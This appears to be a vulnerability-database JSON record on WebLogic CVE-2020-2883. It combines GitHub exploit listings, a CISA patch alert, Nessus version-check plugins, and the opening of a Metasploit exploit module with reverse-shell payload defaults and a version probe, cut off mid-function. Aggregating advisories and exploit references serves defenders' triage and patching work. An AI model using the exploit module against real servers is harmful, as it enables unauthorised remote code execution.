{"githubexploit": [{"lastseen": "2022-08-18T14:10:34", "description": "# POC for weblogic CVE-2020-2883\n\npoc1:\n\n```bash\n javax.manageme...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-05-13T09:56:48", "type": "githubexploit", "title": "Exploit for Vulnerability in Oracle Weblogic Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-2883"], "modified": "2021-11-01T14:05:46", "id": "54F9B4D4-129B-5916-8725-D750A1593FBB", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-18T08:20:31", "description": "<!DOCTYPE html>\n<html dir=\"rtl\" lang=\"fa-IR\">\n\n<head>\n\t<meta cha...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-05-10T09:04:43", "type": "githubexploit", "title": "Exploit for Vulnerability in Oracle Weblogic Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-2883"], "modified": "2022-08-17T09:55:08", "id": "80F73667-B6DA-5D40-984F-3F104E58C6B4", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-17T22:16:15", "description": "<!DOCTYPE html>\n<html dir=\"rtl\" lang=\"fa-IR\">\n\n<head>\n\t<meta cha...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-08-19T03:34:06", "type": "githubexploit", "title": "Exploit for Vulnerability in Oracle Weblogic Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-2883"], "modified": "2022-08-15T01:53:49", "id": "AE10BD2D-66B3-5C55-9296-FA884BA0CA27", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-18T04:21:46", "description": "# CVE-2020-2883\n```\nre write of...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-10-14T23:12:39", "type": "githubexploit", "title": "Exploit for Vulnerability in Oracle Weblogic Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-2883"], "modified": "2020-11-03T23:46:48", "id": "80BDF069-A8BA-5707-9BA2-FB1B734ECD49", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:00:51", "description": "# what's this\nThis project which based weblogic_cmd is a poc for...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-11-26T14:10:25", "type": "githubexploit", "title": "Exploit for Vulnerability in Oracle Weblogic Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-2883"], "modified": "2021-11-16T11:30:53", "id": "56A5375E-A6AB-5DC6-978E-A0DAE6E46CD9", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:47:50", "description": "# CVE-2020-14645\n\n## \u4f7f\u7528\u65b9\u6cd5\n\n\u9996\u5148\u4f7f\u7528[NDI-Injection-Exploit](https://g...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-07-20T11:40:09", "type": "githubexploit", "title": "Exploit for Vulnerability in Oracle Weblogic Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-2883", "CVE-2020-14645"], "modified": "2021-12-04T16:32:59", "id": "9AA8EF18-C44A-5F96-A520-2C2F431271D2", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-03-30T18:09:06", "description": "# weblogicPoc\nWeblogic Vuln POC EXP cve-2020-2551 cve-2020-2555...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-05-16T03:01:32", "type": "githubexploit", "title": "Exploit for Vulnerability in Oracle Weblogic Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-2551", "CVE-2020-2555", "CVE-2020-2883"], "modified": "2022-03-30T14:19:43", "id": "94095106-8E25-54E1-924C-2C3B4E99610F", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}], "cisa": [{"lastseen": "2021-02-24T18:06:49", "description": "Oracle has released a blog post warning users that a previously disclosed Oracle WebLogic Server remote code execution vulnerability (CVE-2020-2883) is being exploited in the wild. Oracle disclosed the vulnerability and provided software patches in their April 2020 Critical Patch Update; however, malicious cyber actors are now known to be targeting unpatched servers.\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) urges users and administrators to review the [Oracle Blog](<https://blogs.oracle.com/security/apply-april-2020-cpu>) and the [April 2020 Critical Patch Updates](<https://www.oracle.com/security-alerts/cpuapr2020.html>) for more information and apply the necessary patches as soon as possible.\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2020/05/01/unpatched-oracle-weblogic-servers-vulnerable-cve-2020-2883>); we'd welcome your feedback.\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-05-01T00:00:00", "type": "cisa", "title": "Unpatched Oracle WebLogic Servers Vulnerable to CVE-2020-2883", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-2883"], "modified": "2020-05-01T00:00:00", "id": "CISA:CF47526108A633F1CF0306DCCE9154EA", "href": "https://us-cert.cisa.gov/ncas/current-activity/2020/05/01/unpatched-oracle-weblogic-servers-vulnerable-cve-2020-2883", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2023-02-17T14:30:02", "description": "Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Core). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3 to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-05-18T00:00:00", "type": "nessus", "title": "Oracle WebLogic Server 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, and 12.2.1.4.0 T3 Access Attack", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-2883"], "modified": "2020-05-18T00:00:00", "cpe": ["cpe:/a:oracle:weblogic_server"], "id": "701276.PRM", "href": "https://www.tenable.com/plugins/nnm/701276", "sourceData": "Binary data 701276.prm", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-03-09T15:12:30", "description": "The version of Oracle WebLogic Server installed on the remote host is affected by a remote code execution vulnerability in the WLS Core Components subcomponent due to unsafe deserialization of Java objects. An unauthenticated remote attacker can exploit this, via a crafted serialized Java object, to execute arbitrary commands.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-07-02T00:00:00", "type": "nessus", "title": "Oracle WebLogic Server Java Object Deserialization RCE (CVE-2020-2883)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-2883"], "modified": "2023-03-08T00:00:00", "cpe": ["cpe:/a:oracle:fusion_middleware", "cpe:/a:oracle:weblogic_server"], "id": "ORACLE_WEBLOGIC_SERVER_CVE_2020_2883.NBIN", "href": "https://www.tenable.com/plugins/nessus/138074", "sourceData": "Binary data oracle_weblogic_server_cve_2020_2883.nbin", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-08T14:52:31", "description": "The version of tested product installed on the remote host is prior to tested version. It is, therefore, affected by multiple vulnerabilities as referenced in the CPUApr2020 advisory.\n\n - A remote code execution vulnerability exists in the Log4j SocketServer class due to unsafe deserialization of untrusted data. An unauthenticated, remote attacker can exploit this to remotely execute arbitrary code when combined with a deserialization gadget when listening to untrusted network traffic for log data. This affects Log4j versions up to 1.2 up to 1.2.17. (CVE-2019-17571)\n\n - An information disclosure vulnerability exists in the Console component. An unauthenticated, remote attacker can exploit this to gain unauthorized read access to a subset of Oracle WebLogic Server accessible data. (CVE-2020-2766)\n\n - A vulnerability in the WLS Web Services component exists. An authenticated, remote attacker can exploit this via T3 to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. (CVE-2020-2798)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-04-16T00:00:00", "type": "nessus", "title": "Oracle WebLogic Server Multiple Vulnerabilities (Apr 2020 CPU)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-16943", "CVE-2019-17359", "CVE-2019-17571", "CVE-2020-2766", "CVE-2020-2798", "CVE-2020-2801", "CVE-2020-2811", "CVE-2020-2828", "CVE-2020-2829", "CVE-2020-2867", "CVE-2020-2869", "CVE-2020-2883", "CVE-2020-2884", "CVE-2020-2963"], "modified": "2023-02-07T00:00:00", "cpe": ["cpe:/a:oracle:fusion_middleware", "cpe:/a:oracle:weblogic_server"], "id": "ORACLE_WEBLOGIC_SERVER_CPU_APR_2020.NASL", "href": "https://www.tenable.com/plugins/nessus/135680", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(135680);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/02/07\");\n\n script_cve_id(\n \"CVE-2019-16943\",\n \"CVE-2019-17359\",\n \"CVE-2019-17571\",\n \"CVE-2020-2766\",\n \"CVE-2020-2798\",\n \"CVE-2020-2801\",\n \"CVE-2020-2811\",\n \"CVE-2020-2828\",\n \"CVE-2020-2829\",\n \"CVE-2020-2867\",\n \"CVE-2020-2869\",\n \"CVE-2020-2883\",\n \"CVE-2020-2884\",\n \"CVE-2020-2963\"\n );\n script_xref(name:\"IAVA\", value:\"2020-A-0153\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0004\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0045\");\n\n script_name(english:\"Oracle WebLogic Server Multiple Vulnerabilities (Apr 2020 CPU)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is affected by multiple vulnerabilities\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of tested product installed on the remote host is prior to tested version. It is, therefore, affected by\nmultiple vulnerabilities as referenced in the CPUApr2020 advisory.\n\n - A remote code execution vulnerability exists in the Log4j SocketServer class due to unsafe deserialization of\n untrusted data. An unauthenticated, remote attacker can exploit this to remotely execute arbitrary code when\n combined with a deserialization gadget when listening to untrusted network traffic for log data. This affects Log4j\n versions up to 1.2 up to 1.2.17. (CVE-2019-17571)\n\n - An information disclosure vulnerability exists in the Console component. An unauthenticated, remote attacker can\n exploit this to gain unauthorized read access to a subset of Oracle WebLogic Server accessible data. (CVE-2020-2766)\n\n - A vulnerability in the WLS Web Services component exists. An authenticated, remote attacker can exploit this via T3\n to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle\n WebLogic Server. (CVE-2020-2798)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.oracle.com/a/tech/docs/cpuapr2020cvrf.xml\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.oracle.com/security-alerts/cpuapr2020.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the appropriate patch according to the April 2020 Oracle Critical Patch Update advisory.\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-2884\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'WebLogic Server Deserialization RCE BadAttributeValueExpException ExtComp');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/04/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/04/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/04/16\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:fusion_middleware\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:weblogic_server\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"oracle_weblogic_server_installed.nbin\", \"os_fingerprint.nasl\");\n script_require_keys(\"installed_sw/Oracle WebLogic Server\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('install_func.inc');\n\napp_name = 'Oracle WebLogic Server';\n\nos = get_kb_item_or_exit('Host/OS');\nif ('windows' >< tolower(os))\n{\n port = get_kb_item('SMB/transport');\n if (!port) port = 445;\n}\nelse port = 0;\n\ninstall = get_single_install(app_name:app_name, exit_if_unknown_ver:TRUE);\nversion = install['version'];\n\nfix = NULL;\nfix_ver = NULL;\n\nif (version =~ \"^12\\.2\\.1\\.4($|[^0-9])\")\n{\n fix_ver = '12.2.1.4.200228';\n fix = make_list('30970477', '30761841', '31101341');\n}\n\nelse if (version =~ \"^12\\.2\\.1\\.3($|[^0-9])\")\n{\n fix_ver = '12.2.1.3.200227';\n fix = make_list('30965714');\n}\nelse if (version =~ \"^12\\.1\\.3\\.\")\n{\n fix_ver = '12.1.3.0.200414';\n fix = make_list('30857795');\n}\nelse if (version =~ \"^10\\.3\\.6\\.\")\n{\n fix_ver = '10.3.6.0.200414';\n fix = make_list('Q3ZB');\n}\n\nif (isnull(fix_ver) || ver_compare(ver:version, fix:fix_ver, strict:FALSE) >= 0)\n audit(AUDIT_INST_PATH_NOT_VULN, app_name, version, install['path']);\n\nelse {\n report =\n '\\n Oracle Home : ' + install['Oracle Home'] +\n '\\n Install path : ' + install['path'] +\n '\\n Version : ' + version +\n '\\n Fixes : ' + join(sep:', ', fix);\n security_report_v4(extra:report, severity:SECURITY_HOLE, port:port);\n}\n\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "zdt": [{"lastseen": "2021-12-26T01:20:09", "description": "This Metasploit module exploits a Java object deserialization vulnerability in multiple versions of WebLogic. Unauthenticated remote code execution can be achieved by sending a serialized BadAttributeValueExpException object over the T3 protocol to vulnerable versions of WebLogic. Leveraging an ExtractorComparator enables the ability to trigger method.invoke(), which will execute arbitrary code.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-06-08T00:00:00", "type": "zdt", "title": "WebLogic Server Deserialization Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-2883"], "modified": "2020-06-08T00:00:00", "id": "1337DAY-ID-34538", "href": "https://0day.today/exploit/description/34538", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::Remote::Tcp\n include Msf::Exploit::CmdStager\n include Msf::Exploit::Powershell\n include Msf::Exploit::Remote::AutoCheck\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'WebLogic Server Deserialization RCE BadAttributeValueExpException ExtComp',\n 'Description' => %q{\n There exists a Java object deserialization vulnerability\n in multiple versions of WebLogic.\n\n Unauthenticated remote code execution can be achieved by\n sending a serialized `BadAttributeValueExpException`\n object over the T3 protocol to vulnerable versions of\n WebLogic. Leveraging an `ExtractorComparator` enables\n the ability to trigger `method.invoke()`, which will\n execute arbitrary code.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Quynh Le', # Vulnerability Discovery\n 'Y4er', # PoC\n 'Shelby Pace' # Metasploit Module\n ],\n 'References' =>\n [\n [ 'CVE', '2020-2883' ],\n [ 'URL', 'https://www.thezdi.com/blog/2020/5/8/details-on-the-oracle-weblogic-vulnerability-being-exploited-in-the-wild' ],\n ],\n 'Platform' => %w[unix linux win],\n 'Arch' => [ ARCH_X86, ARCH_X64 ],\n 'Privileged' => false,\n 'Targets' =>\n [\n [\n 'Windows',\n {\n 'Platform' => 'win',\n 'Arch' => [ ARCH_X86, ARCH_X64 ],\n 'DefaultOptions' => { 'Payload' => 'windows/meterpreter/reverse_tcp' }\n }\n ],\n [\n 'Unix',\n {\n 'Platform' => %w[unix linux],\n 'CmdStagerFlavor' => 'printf',\n 'Arch' => [ ARCH_X86, ARCH_X64 ],\n 'DefaultOptions' => { 'Payload' => 'linux/x86/meterpreter/reverse_tcp' }\n }\n ],\n ],\n 'DisclosureDate' => '2020-04-30',\n 'DefaultTarget' => 0\n )\n )\n\n register_options([ Opt::RPORT(7001) ])\n end\n\n def check\n connect\n\n web_req = \"GET /console/login/LoginForm.jsp HTTP/1.1\\nHost: #{peer}\\n\\n\"\n sock.put(web_req)\n sleep(2)\n res = sock.get_once\n\n versions =\n [\n Gem::Version.new('12.1.3.0.0'), Gem::Version.new('12.2.1.3.0'),\n Gem::Version.new('12.2.1.4.0')\n ]\n\n return CheckCode::Unknown('Failed to obtain response from service') unless res\n\n /WebLogic\\s+Server\\s+Version:\\s+(?<version>\\d+\\.\\d+\\.\\d+\\.*\\d*\\.*\\d*)/ =~ res\n return CheckCode::Unknown('Failed to detect WebLogic') unless version\n\n @version_no = 